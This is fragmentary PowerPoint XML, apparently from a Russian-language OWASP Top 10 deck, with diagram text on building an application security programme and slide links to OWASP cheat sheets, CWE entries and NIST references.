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4"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125" d="100"/>
          <a:sy n="125" d="100"/>
        </p:scale>
        <p:origin x="378" y="-2388"/>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требуемый уровень защиты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приложений</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политики и стандарты</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набор стандартных средств обеспечения безопасности</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курсы по обеспечению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sz="1000" b="1"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 процессы</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безопасной реализации</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контролю</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ru-RU" sz="95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моделирование угроз</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ru-RU" sz="95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анализ проектов</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ru-RU" sz="95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его анализ</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пентест</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ru-RU" sz="95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служб поддержки для разработчиков и проектной команды</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ru-RU" sz="950">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>.</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недостающих возможностей, сравнив свою организацию с другими компаниями</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ru-RU" sz="95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план повышения осведомленности о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модель оценки наиболее распространенных угроз</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программу обеспечения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custLinFactNeighborX="-27" custLinFactNeighborY="3383">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114705">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sz="900" b="1"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sz="950" b="1"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ct val="100000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="ru-RU" sz="78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dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>. </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ru-RU" sz="780" b="1" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Примечание:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ru-RU" sz="78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103652">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23089">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26286">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3193" y="-2199947"/>
          <a:ext cx="108224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a:p>
          <a:pPr marL="82800" lvl="1" indent="-82800" algn="l" defTabSz="422275">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pP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программу обеспечения безопасности приложений</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анализ недостающих возможностей, сравнив свою организацию с другими компаниями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план повышения осведомленности о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sp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2087372" y="91536"/>
        <a:ext cx="5453890" cy="976585"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1091206" y="45850"/>
          <a:ext cx="941833" cy="11554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sp:txBody>
      <dsp:txXfrm>
        <a:off x="1137182" y="91826"/>
        <a:ext cx="849881" cy="1063509"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{29555282-7DBF-4954-82C2-561252AD070F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4217977" y="-964151"/>
          <a:ext cx="118679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требуемый уровень защиты</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приложений</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модель оценки наиболее распространенных угроз</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kern="12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sp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2089535" y="1280161"/>
        <a:ext cx="5443682" cy="1070928"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{32E4C202-A073-4E81-BC9F-5F3538C94998}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1092707" y="1238553"/>
          <a:ext cx="938893" cy="115414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sp:txBody>
      <dsp:txXfrm>
        <a:off x="1138540" y="1284386"/>
        <a:ext cx="847227" cy="1062476"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F55C0F19-ACD0-452E-8743-4A25E747654D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4288799" y="271800"/>
          <a:ext cx="104515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политики и стандарты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набор стандартных средств обеспечения безопасности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курсы по обеспечению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sp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2082620" y="2580019"/>
        <a:ext cx="5457512" cy="943114"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1092707" y="2473689"/>
          <a:ext cx="938893" cy="1155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sp:txBody>
      <dsp:txXfrm>
        <a:off x="1138540" y="2519522"/>
        <a:ext cx="847227" cy="1064106"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1BBF15A1-D05A-4DF7-B79B-CA1460F5C0E4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4408959" y="1505313"/>
          <a:ext cx="80483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безопасной реализации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контролю</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моделирование угроз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проектов</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его анализ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пентест</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служб поддержки для разработчиков и проектной команды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70890" y="3921960"/>
        <a:ext cx="5480974" cy="726257"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{17989DDF-81A9-4A76-BCBA-5B2768E57B7F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1092707" y="3694127"/>
          <a:ext cx="938893" cy="11819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kern="1200"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kern="1200"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 процессы</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1138540" y="3739960"/>
        <a:ext cx="847227" cy="1090257"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4283491" y="2737533"/>
          <a:ext cx="1055770"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sp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2083138" y="5040962"/>
        <a:ext cx="5456476" cy="952694"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{00DAAF4C-114B-41A9-AAA5-51A8EB19C769}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1092707" y="4940716"/>
          <a:ext cx="938893" cy="115318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6549"/>
        <a:ext cx="847227" cy="1061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00115" y="-2223291"/>
          <a:ext cx="9737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sp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1319373" y="52521"/>
        <a:ext cx="5335237" cy="878682"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="155854" y="6744"/>
          <a:ext cx="1115983" cy="97023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sp:txBody>
      <dsp:txXfrm>
        <a:off x="203217" y="54107"/>
        <a:ext cx="1021257" cy="875508"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{29555282-7DBF-4954-82C2-561252AD070F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3470292" y="-1099313"/>
          <a:ext cx="1033398"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a:p>
          <a:pPr marL="82800" lvl="1" indent="-82800" algn="l" defTabSz="346710" rtl="0">
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="••"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="ru-RU" sz="780" kern="120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kern="120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kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>. </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ru-RU" sz="780" b="1" kern="1200" dirty="0">
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
              <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Примечание:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="ru-RU" sz="780" kern="120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sp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1322284" y="1149587"/>
        <a:ext cx="5329415" cy="932506"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{32E4C202-A073-4E81-BC9F-5F3538C94998}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="155854" y="1037453"/>
          <a:ext cx="1115983" cy="1156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sp:txBody>
      <dsp:txXfrm>
        <a:off x="210332" y="1091931"/>
        <a:ext cx="1007027" cy="1047816"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F55C0F19-ACD0-452E-8743-4A25E747654D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3408815" y="116779"/>
          <a:ext cx="11563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kern="120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sp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1328286" y="2310204"/>
        <a:ext cx="5317411" cy="1043456"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F564D79A-2552-48FA-AA2D-99B849FE28FB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="155854" y="2252941"/>
          <a:ext cx="1115983" cy="115798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rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="ru-RU" sz="900" b="1" kern="1200"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sp:txBody>
      <dsp:txXfrm>
        <a:off x="210332" y="2307419"/>
        <a:ext cx="1007027" cy="1049026"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{992D08B6-B207-435B-A893-D17B49418ACB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3302834" y="1467374"/>
          <a:ext cx="1360831"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ts val="1000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="355600">
            <a:lnSpc>
              <a:spcPct val="9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sp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1337178" y="3565890"/>
        <a:ext cx="5292144" cy="1227971"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5CD1B5CA-4D0D-4D4E-B88E-2005B67086FE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="155854" y="3469639"/>
          <a:ext cx="1114893" cy="142047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22275" rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="ru-RU" sz="950" b="1" kern="1200"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sp:txBody>
      <dsp:txXfrm>
        <a:off x="210279" y="3524064"/>
        <a:ext cx="1006043" cy="1311624"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0BBDD660-3A49-4256-9C52-69675972DDC1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3390056" y="2830866"/>
          <a:ext cx="1186386"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342265" rtl="0">
            <a:lnSpc>
              <a:spcPts val="1000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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sp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1328662" y="5008090"/>
        <a:ext cx="5309174" cy="1070556"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D01C5B61-0A7B-4E05-A4E4-BE9BD871660D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="155854" y="4948829"/>
          <a:ext cx="1114893" cy="118907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sp:txBody>
      <dsp:txXfrm>
        <a:off x="210279" y="5003254"/>
        <a:ext cx="1006043" cy="1080228"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B80FA0B1-2C5B-4040-953D-4B7309BF6238}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3695327" y="3846050"/>
          <a:ext cx="58332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sp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1300314" y="6298015"/>
        <a:ext cx="5373355" cy="526377"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{50CC931A-2802-4A28-B17D-4CFEC4144601}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="155854" y="6196622"/>
          <a:ext cx="1115983" cy="7291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sp:txBody>
      <dsp:txXfrm>
        <a:off x="191449" y="6232217"/>
        <a:ext cx="1044793" cy="6579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14.01.2019</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1/14/2019</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smtClean="0"/>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smtClean="0"/>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smtClean="0"/>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smtClean="0"/>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Transport_Layer_Protection_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/HTTP_Strict_Transport_Security_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/319.html" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.png"/><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OWASP_Proactive_Controls#7:_Protect_Data" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Secure_Headers_Project" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://cwe.mitre.org/data/definitions/312.html" TargetMode="Externa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hyperlink" Target="http://cwe.mitre.org/data/definitions/311.html" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/359.html" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.png"/><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Cryptographic_Storage_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wikipedia.org/wiki/PBKDF2"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cwe.mitre.org/data/definitions/310.html" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wikipedia.org/wiki/Bcrypt" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Password_Storage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User_Privacy_Protection_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_weak_Cryptography" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://wikipedia.org/wiki/Scrypt" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId30"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XML_External_Entity_(XXE)_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web-in-security.blogspot.tw/2014/11/detecting-and-exploiting-xxe-in-saml.html" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide10.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://secretsofappsecurity.blogspot.tw/2017/01/saml-security-xml-external-entity-attack.html"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9.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_XML_Injection_(OTG-INPVAL-008)" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.ioactive.com/2014/11/die-laughing-from-billion-laughs.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611.html" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><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Security_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Source_Code_Analysis_Tool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we.mitre.org/data/definitions/22.html" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Source_Code_Analysis_Tools" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide11.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Access_Control_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties"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5.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag10.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_Authorization" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/639.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image" Target="../media/image8.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/285.html" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls#6:_Implement_Access_Controls" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/284.html" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:Vulnerability_Scanning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SVS_V19_Configuration" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cisecurity.org/cis-benchmarks/" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><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6.png"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag11.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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/2.html" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide16.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://csrc.nist.gov/publications/detail/sp/800-123/final" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.websecurify.com/2017/10/aws-s3-bucket-discovery.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9.html" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide13.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><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developer.mozilla.org/en-US/docs/Web/HTTP/CSP" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><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portswigger.net/kb/issues/00200308_clientsidetemplateinjectio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image" Target="../media/image8.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><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owasp.blogspot.com/2017/08/owasp-top-10-2017-project-update.html" TargetMode="Externa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frohoff.github.io/appseccali-marshalling-pickles/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls#4:_Validate_All_Inputs" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/mbechler/marshalsec"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 Id="rId1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26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image5.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide15.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.png"/><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24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><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23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.png"/><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 Id="rId22"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OWASP_AppSensor_Project" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide16.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image6.png"/><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src.nist.gov/publications/detail/sp/800-61/rev-2/final" TargetMode="External"/><Relationship Id="rId17"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hyperlink" Target="https://www-01.ibm.com/common/ssi/cgi-bin/ssialias?htmlfid=SEL03130WWEN&amp;" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><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778.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cwe.mitre.org/data/definitions/223.html" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9.png"/><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Category:OWASP_ModSecurity_Core_Rule_Set_Project" TargetMode="External"/><Relationship Id="rId22"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owasp.org/index.php/Threat_Risk_Modeling" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator"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asd.gov.au/infosec/mitigationstrategies.htm"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nist.gov/cyberframework"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iso.org/ru/isoiec-27001-information-security.html"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ru/iso-31000-risk-management.html" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/en-us/download/details.aspx?id=4916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Testing_for_SQL_Injection_(OTG-INPVAL-005)" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Injection_Prevention_Cheat_Sheet_in_Java" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/564.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ASVS_V5_Input_validation_and_output_encoding" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/89.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s://portswigger.net/kb/issues/00101080_serversidetemplateinjection" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag6.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls#2:_Parameterize_Queries" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Injection_Prevention_Cheat_Sheet"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for_ORM_Injection_(OTG-INPVAL-007)" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/917.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Command_Injection_(OTG-INPVAL-013)" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Query_Parameterization_Cheat_Sheet" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Injection_Flaw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Forgot_Password_Cheat_Sheet" TargetMode="External"/><Relationship 